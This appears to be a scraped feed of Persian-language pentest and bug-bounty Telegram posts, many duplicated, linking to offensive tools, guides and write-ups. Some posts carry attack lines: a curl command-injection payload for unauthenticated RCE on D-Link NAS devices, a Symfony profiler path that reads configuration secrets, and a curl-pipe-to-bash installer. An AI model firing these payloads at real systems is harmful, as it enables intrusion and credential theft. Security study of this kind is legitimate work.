🏭 اگر درگیر تست نفوذ هستید، ممکن است اغلب کنترلکنندههای منطقی قابل برنامهریزی (PLC)، دستگاههایی که برای کنترل پروسس های صنعتی استفاده میشوند، در زیرساخت داخلی کلاینت پیدا کنید.
🧰 به نظر می رسد که مایکروسافت یک چارچوب منبع باز برای پزشکی قانونی چنین دستگاه هایی، به طور دقیق تر، برای تجزیه و تحلیل ابرداده و فایل های پروژه PLC دارد.
✔️ این یک راه راحت برای اسکن PLC ها و شناسایی هر گونه مصنوعات مشکوک در محیط های ICS ارائه می دهد که می تواند برای بازرسی دستی، وظایف نظارت خودکار، یا عملیات پاسخ به حادثه برای شناسایی دستگاه های در معرض خطر استفاده شود. و بله، می توان آن را مطابق با نیازهای شما سفارشی کرد.
👩💻 GitHub
#pentest #redteam #tools
@TryHackBox
🧰 به نظر می رسد که مایکروسافت یک چارچوب منبع باز برای پزشکی قانونی چنین دستگاه هایی، به طور دقیق تر، برای تجزیه و تحلیل ابرداده و فایل های پروژه PLC دارد.
✔️ این یک راه راحت برای اسکن PLC ها و شناسایی هر گونه مصنوعات مشکوک در محیط های ICS ارائه می دهد که می تواند برای بازرسی دستی، وظایف نظارت خودکار، یا عملیات پاسخ به حادثه برای شناسایی دستگاه های در معرض خطر استفاده شود. و بله، می توان آن را مطابق با نیازهای شما سفارشی کرد.
👩💻 GitHub
#pentest #redteam #tools
@TryHackBox
👍3
نسخه exchange مایکروسافت را پیدا کنید
https://github.com/righel/ms-exchange-version-nse.git
#tools #pentest #linux
@TryHackBox
nmap -p 443 script ms-exchange-version.nse target
https://github.com/righel/ms-exchange-version-nse.git
#tools #pentest #linux
@TryHackBox
👍2
اگر مال شماست، مسیری را پیدا کنید که "neighbor" شل را در امتداد آن قرار داده است تا آن را حذف یا مشاهده کنید. سپس می توانید دستور را اجرا کنید
بیشتر از طریق
بیایید PID را پیدا کنیم. و می توانید با کمک دستور :
#activedirectory #windows #pentest
@TryHackBox
powershell -command "Get-Process | ForEach-Object { $_.Path }"
بیشتر از طریق
tasklist -v
بیایید PID را پیدا کنیم. و می توانید با کمک دستور :
taskkill /PID process_id
#activedirectory #windows #pentest
@TryHackBox
تولید کننده نام کاربری دامنه فعال😈
https://github.com/w0Tx/generate-ad-username
#pentest #activedirectory #linux
@TryHackBox
https://github.com/w0Tx/generate-ad-username
#pentest #activedirectory #linux
@TryHackBox
💡 برگه تقلب اکتیو دایرکتوری
- مخزنی که در آن یک متدولوژی کلی برای کار در اکتیو دایرکتوری پیدا خواهید کرد. Inside مجموعه ای از دستورات سریع از مؤثرترین ابزارهای مبتنی بر Powershell، C، .Net 3.5 و .Net 4.5 است.
🥷 مخزن به روزترین نیست، اما برای مبتدیان عالی است که اصول را درک کنند.
• Recon
• Domain Enum
• Local Privilege Escalation
• Local Account Stealing
• Monitor Potential Incoming Account
• Local Account Stealing
• Admin Recon
• Lateral Movement
• Remote Administration
• Domain Admin Privileges
• Cross Trust Attacks
• Persistance and Exfiltrate
👉 GitHub
#redteam #pentest #cheatsheet
@TryHackBox
- مخزنی که در آن یک متدولوژی کلی برای کار در اکتیو دایرکتوری پیدا خواهید کرد. Inside مجموعه ای از دستورات سریع از مؤثرترین ابزارهای مبتنی بر Powershell، C، .Net 3.5 و .Net 4.5 است.
🥷 مخزن به روزترین نیست، اما برای مبتدیان عالی است که اصول را درک کنند.
• Recon
• Domain Enum
• Local Privilege Escalation
• Local Account Stealing
• Monitor Potential Incoming Account
• Local Account Stealing
• Admin Recon
• Lateral Movement
• Remote Administration
• Domain Admin Privileges
• Cross Trust Attacks
• Persistance and Exfiltrate
👉 GitHub
#redteam #pentest #cheatsheet
@TryHackBox
🔎 یافتن SSRF در برنامه های NextJS
تیم Assetnote یک منبع جالب دیگر دارد. مقاله جدیدی به پتانسیل وقوع SSRF در برنامه های NextJS به دلیل پیکربندی های نادرست می پردازد.
به طور خاص، روی مؤلفه _next/image تمرکز میکند و نشان میدهد که چگونه مهاجمان میتوانند از این نقاط ضعف برای انجام حملات SSRF، از جمله توضیح دقیق دور زدن امنیتی و آسیبپذیری SSRF اخیراً کشف شده، که به CVE-2024-34351 اختصاص داده شده است، سوء استفاده کنند.
#pentest #bugbounty
https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps
@TryHackBox
تیم Assetnote یک منبع جالب دیگر دارد. مقاله جدیدی به پتانسیل وقوع SSRF در برنامه های NextJS به دلیل پیکربندی های نادرست می پردازد.
به طور خاص، روی مؤلفه _next/image تمرکز میکند و نشان میدهد که چگونه مهاجمان میتوانند از این نقاط ضعف برای انجام حملات SSRF، از جمله توضیح دقیق دور زدن امنیتی و آسیبپذیری SSRF اخیراً کشف شده، که به CVE-2024-34351 اختصاص داده شده است، سوء استفاده کنند.
#pentest #bugbounty
https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps
@TryHackBox
💡 اگر در حین باگ بانتی / تست نفوذ با یک برنامه وب در Symfony مواجه شدید، وجود حالت اشکال زدایی (
#tips #bugbounty #pentest
@TryHackBox
/app_dev.php
) و توانایی خواندن پیکربندی را بررسی کنید:
/app_dev.php/_profiler/open?file=app/config/parameters.yml
#tips #bugbounty #pentest
@TryHackBox
👍6
🔥 وقتی در مورد امنیت سمت کلاینت صحبت می کنیم، XSS و چندین حمله محبوب دیگر به ذهن خطور می کند. اما باور کنید، دنیای حملات سمت مشتری بسیار گسترده تر است. خودتان در این راهنمای جامع ببینید:
1. XSS (Cross-Site Scripting)
2. CSP (Content Security Policy)
3. Sanitization
4. HTML injection
5. CSS injection
6. DOM clobbering
7. Prototype pollution
8. CSRF (Cross-site request forgery)
9. CORS (Cross-origin resource sharing)
10. Cookie tossing
11. Cookie bomb
12. Clickjacking
13. MIME sniffing
14. XSLeaks (Cross-site leaks)
15. CSTI (Client-side template injection)
16. Subdomain takeover
17. Dangling markup injection
18. Supply chain attack
#bugbounty #pentest
@TryHackBox
1. XSS (Cross-Site Scripting)
2. CSP (Content Security Policy)
3. Sanitization
4. HTML injection
5. CSS injection
6. DOM clobbering
7. Prototype pollution
8. CSRF (Cross-site request forgery)
9. CORS (Cross-origin resource sharing)
10. Cookie tossing
11. Cookie bomb
12. Clickjacking
13. MIME sniffing
14. XSLeaks (Cross-site leaks)
15. CSTI (Client-side template injection)
16. Subdomain takeover
17. Dangling markup injection
18. Supply chain attack
#bugbounty #pentest
@TryHackBox
👍2
👹 هیولاها در کد شما - GitHub Actions Cache Poisoning
آیا دوست دارید باگ های پیچیده چند مرحله ای را بررسی کنید؟ سپس این نوشته برای شماست. نویسنده تکنیکی را برای افزایش دسترسی و حرکت جانبی در GitHub Actions توصیف می کند که آن را "Actions Cache Blasting" می نامد.
بخوانید
#pentest #bugbounty #writeup
@TryHackBox
آیا دوست دارید باگ های پیچیده چند مرحله ای را بررسی کنید؟ سپس این نوشته برای شماست. نویسنده تکنیکی را برای افزایش دسترسی و حرکت جانبی در GitHub Actions توصیف می کند که آن را "Actions Cache Blasting" می نامد.
بخوانید
#pentest #bugbounty #writeup
@TryHackBox
👍2
Pentest GPT
دستیار هوش مصنوعی که می تواند ابزارهای مختلف #pentest را اجرا کند. به صورت رایگان در دسترس است:
- CVEMap
- زیر دامنه یاب
- لینک یاب
- آشکارساز WAF
- جستجوی Whois
دستورات ترمینال Nuclei، SQLi Exploiter، Katana و Linux در نسخه PRO موجود هستند.
pentestgpt.ai
@TryHackBox
دستیار هوش مصنوعی که می تواند ابزارهای مختلف #pentest را اجرا کند. به صورت رایگان در دسترس است:
- CVEMap
- زیر دامنه یاب
- لینک یاب
- آشکارساز WAF
- جستجوی Whois
دستورات ترمینال Nuclei، SQLi Exploiter، Katana و Linux در نسخه PRO موجود هستند.
pentestgpt.ai
@TryHackBox
🔥2
🔖 تیم PortSwigger ابزار SignSaboteur را معرفی کرده است که با آن می توانید به راحتی توکن های وب امضا شده را جعل کنید.
توکن های وب امضا شده به طور گسترده برای احراز هویت و مجوز stateless در وب استفاده می شوند. محبوبترین فرمت JSON است، اما فراتر از آن، اکوسیستم استانداردهای پر رونقی وجود دارد که هرکدام دارای پیادهسازی خاص خود از ذخیرهسازی داده و امنیت هستند.
ابزار جدید برای کمک به ارزیابی آنها طراحی شده است. این طراحی شده است تا حملات ذکر شده را خودکار کند و تضمین کند که دیگر پیکربندی های ناامن را از دست ندهید.
اطلاعیه
https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease
#pentest #tools
@TryHackBox
توکن های وب امضا شده به طور گسترده برای احراز هویت و مجوز stateless در وب استفاده می شوند. محبوبترین فرمت JSON است، اما فراتر از آن، اکوسیستم استانداردهای پر رونقی وجود دارد که هرکدام دارای پیادهسازی خاص خود از ذخیرهسازی داده و امنیت هستند.
ابزار جدید برای کمک به ارزیابی آنها طراحی شده است. این طراحی شده است تا حملات ذکر شده را خودکار کند و تضمین کند که دیگر پیکربندی های ناامن را از دست ندهید.
اطلاعیه
https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease
#pentest #tools
@TryHackBox
👍3🔥2
🥷 IDOR :
راهنمای کامل برای بهره برداری از آسیب پذیری های پیچیده IDOR
با کمک این راهنما، یاد می گیرید که IDOR های ساده و پیچیده را شناسایی و کار کنید.
بخوانید
#guide #pentest #bugbounty@TryHackBox
@TryHackBox
راهنمای کامل برای بهره برداری از آسیب پذیری های پیچیده IDOR
با کمک این راهنما، یاد می گیرید که IDOR های ساده و پیچیده را شناسایی و کار کنید.
بخوانید
#guide #pentest #bugbounty@TryHackBox
@TryHackBox
👍2
5️⃣ راه های آسان برای هک یک برنامه وب با استفاده از GraphQL
اگر endoint مورد نظر را پیدا کرده اید (به عنوان مثال، /graphql )، ممکن است چندین گزینه برای exploitation بیشتر وجود داشته باشد:
🔷 Introspection query enabled
🔷 Introspection field suggestions
🔷 GET/POST based CSRF
🔷 Bypassing rate limits
🔷 Denial of service through batched queries
و بله، این یک لیست جامع نیست. این راهنما، در میان چیزهای دیگر، ابزارهایی را فهرست میکند که کار دستی را خودکار میکنند.
https://blog.intigriti.com/2024/05/31/five-easy-ways-to-hack-graphql-targets/
#pentest #bugbounty #guide
@TryHackBox
اگر endoint مورد نظر را پیدا کرده اید (به عنوان مثال، /graphql )، ممکن است چندین گزینه برای exploitation بیشتر وجود داشته باشد:
🔷 Introspection query enabled
🔷 Introspection field suggestions
🔷 GET/POST based CSRF
🔷 Bypassing rate limits
🔷 Denial of service through batched queries
و بله، این یک لیست جامع نیست. این راهنما، در میان چیزهای دیگر، ابزارهایی را فهرست میکند که کار دستی را خودکار میکنند.
https://blog.intigriti.com/2024/05/31/five-easy-ways-to-hack-graphql-targets/
#pentest #bugbounty #guide
@TryHackBox
👍1
🐙 Osmedeus
— یک موتور Go برای امنیت تهاجمی است. این ابزار برای ایجاد یک زیرساخت با قابلیتها و انعطافپذیری طراحی شده که به کاربران اجازه میدهد یک سیستم اطلاعاتی سفارشی ایجاد کرده و آن را روی تعداد زیادی از اهداف راهاندازی کنند.
👉 GitHub
#recon #pentest
@TryHackBox
— یک موتور Go برای امنیت تهاجمی است. این ابزار برای ایجاد یک زیرساخت با قابلیتها و انعطافپذیری طراحی شده که به کاربران اجازه میدهد یک سیستم اطلاعاتی سفارشی ایجاد کرده و آن را روی تعداد زیادی از اهداف راهاندازی کنند.
bash <(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)
👉 GitHub
#recon #pentest
@TryHackBox
👏2
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 یکی از ساده ترین راه ها برای پیدا کردن SQL injection با استفاده از جستجوی کد Github
➡️همان مثال برای SSRF:
#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
➡️همان مثال برای SSRF:
/file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/
/(subprocess|exec|spawn|system).*chrome.*--headless/
#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍7👏2🤩2🔥1
🔥 در ابزار Nuclei روش جدیدی برای تشخیص حملات XSS اضافه شده است!
در این راهنما، استفاده از حالت headless در nuclei برای تشخیص سادهتر و دقیقتر XSS با استفاده از عملگر
🔹 مطالعهٔ راهنما
#guide #bugbounty #pentest
@TryHackBox
در این راهنما، استفاده از حالت headless در nuclei برای تشخیص سادهتر و دقیقتر XSS با استفاده از عملگر
waitdialog
توضیح داده شده است. این روش به طور قابل توجهی پیچیدگی مقایسه پاسخهای سرور را کاهش میدهد و در عین حال دقت بالایی را حفظ میکند.🔹 مطالعهٔ راهنما
#guide #bugbounty #pentest
@TryHackBox
👍13
🧐 آیا قبلاً خواستهاید به سرعت باگهای «HTTP Request Smuggling» را تست کنید؟
Smuggler
یک ابزار خودکار است که به شما در تشخیص آسیبپذیریهای HTTP request smuggling و همچنین HTTP desync کمک میکند. دقت کنید، این ابزار ممکن است در برخی موارد نتیجه فالس (غلط) اعلام کند، به خاطر ذات پیچیده همین آسیبپذیری.
👉 GitHub
#tools #pentest #bugbounty
@TryHackBox
Smuggler
یک ابزار خودکار است که به شما در تشخیص آسیبپذیریهای HTTP request smuggling و همچنین HTTP desync کمک میکند. دقت کنید، این ابزار ممکن است در برخی موارد نتیجه فالس (غلط) اعلام کند، به خاطر ذات پیچیده همین آسیبپذیری.
👉 GitHub
#tools #pentest #bugbounty
@TryHackBox
👍6❤1
🔥 به تحقیق در مورد امنیت وردپرس علاقه دارید؟
محقق امنیتی، آناندا داکال، روش خود را برای پیدا کردن تزریق SQL غیرمجاز در افزونه WooCommerce Wishlist وردپرس شرکت TI به اشتراک میگذارد.
https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
#pentest #bugbounty #bestpractices
@TryHackBox
محقق امنیتی، آناندا داکال، روش خود را برای پیدا کردن تزریق SQL غیرمجاز در افزونه WooCommerce Wishlist وردپرس شرکت TI به اشتراک میگذارد.
https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
#pentest #bugbounty #bestpractices
@TryHackBox
❤2
🥷 تزریق فرمان در پارامتر NAME برای D-Link NAS
اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیرهسازی دادههای شبکه، که بیش از ۶۰٬۰۰۰ عدد از آنها از طریق اینترنت در دسترس هستند.
یک باگ بسیار ساده که میتوان با فازبندی ساده پیدا کرد:
#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیرهسازی دادههای شبکه، که بیش از ۶۰٬۰۰۰ عدد از آنها از طریق اینترنت در دسترس هستند.
یک باگ بسیار ساده که میتوان با فازبندی ساده پیدا کرد:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
🔥5